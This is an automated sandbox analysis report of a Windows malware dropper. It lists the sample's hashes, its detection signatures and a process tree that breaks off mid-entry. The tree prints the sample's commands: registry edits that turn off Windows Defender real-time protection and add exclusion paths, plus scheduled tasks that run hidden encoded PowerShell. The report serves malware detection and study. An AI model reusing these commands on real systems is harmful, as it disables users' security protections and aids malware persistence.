79793a5b073765a56bf37ed294f4faad4a92f236266cd98d7d008271bf05eaa9

Analysis

max time kernel
158s
max time network
159s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04-10-2022 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

a574b3416e21d5a4fb59d046d2c57eda
SHA1

3c8c16bc57a0dcb8f22be1cf0fe9b48da11aced7
SHA256

79793a5b073765a56bf37ed294f4faad4a92f236266cd98d7d008271bf05eaa9
SHA512

497b77b679b6224bd6a209139146c6aa7fe0daa8cbe4f6f50343ca1eeea490d3d40149e53f444197da6479d7055dd317cf77986326b9aeb6970da21da68b7481
SSDEEP

196608:91Oe+Wg2zsvJ5eFjz2LT6KY0wm4P/eUZMEuIDhTpiGUhzo:3OezzRFeLOKY9/+Eu9E

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1368	Install.exe
844	Install.exe
824	jooNPbQ.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1708	file.exe
1368	Install.exe
1368	Install.exe
1368	Install.exe
1368	Install.exe
844	Install.exe
844	Install.exe
844	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jooNPbQ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	jooNPbQ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jooNPbQ.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
944	schtasks.exe
1948	schtasks.exe
984	schtasks.exe
1144	schtasks.exe
1500	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
524	powershell.EXE
524	powershell.EXE
524	powershell.EXE
1656	powershell.EXE
1656	powershell.EXE
1656	powershell.EXE
1552	powershell.EXE
1552	powershell.EXE
1552	powershell.EXE
288	powershell.EXE
288	powershell.EXE
288	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	524	powershell.EXE
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeDebugPrivilege	1552	powershell.EXE
Token: SeDebugPrivilege	288	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1708 wrote to memory of 1368	1708	file.exe	26
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 1368 wrote to memory of 844	1368	Install.exe	27
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 1808	844	Install.exe	29
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 844 wrote to memory of 364	844	Install.exe	31
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 364 wrote to memory of 1400	364	forfiles.exe	34
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 1808 wrote to memory of 1144	1808	forfiles.exe	33
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1144 wrote to memory of 1948	1144	cmd.exe	35
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1400 wrote to memory of 1852	1400	cmd.exe	36
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1400 wrote to memory of 680	1400	cmd.exe	37
PID 1144 wrote to memory of 520	1144	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Users\Admin\AppData\Local\Temp\7zSAB8C.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Users\Admin\AppData\Local\Temp\7zSC9A6.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:844
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1808
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1144
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1948
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:520
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:364
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1400
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1852
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:680
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "giPsjWZnU" /SC once /ST 03:34:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1500
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "giPsjWZnU"
      4⤵
      PID:1784
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "giPsjWZnU"
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 15:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\jooNPbQ.exe\" sw /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:944

C:\Windows\system32\taskeng.exe
taskeng.exe {275ABC52-1F1D-411B-B213-465B3902D805} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:524
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1784

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1720

C:\Windows\system32\taskeng.exe
taskeng.exe {7C235729-0073-447E-AEE5-E4C65D1FF47E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1576
- C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\jooNPbQ.exe
  C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\jooNPbQ.exe sw /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "geNavQJkv" /SC once /ST 02:35:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1948
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "geNavQJkv"
    3⤵
    PID:652
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "geNavQJkv"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1604
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1720
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gZmrzuDnK" /SC once /ST 11:04:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:984
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gZmrzuDnK"
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gZmrzuDnK"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:640
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\kjecrfOn\kyXelRofhemBntML.wsf"
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\kjecrfOn\kyXelRofhemBntML.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:864
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:304
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:288
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:616
  - - C:\Windows\SysWOW64\reg.exe
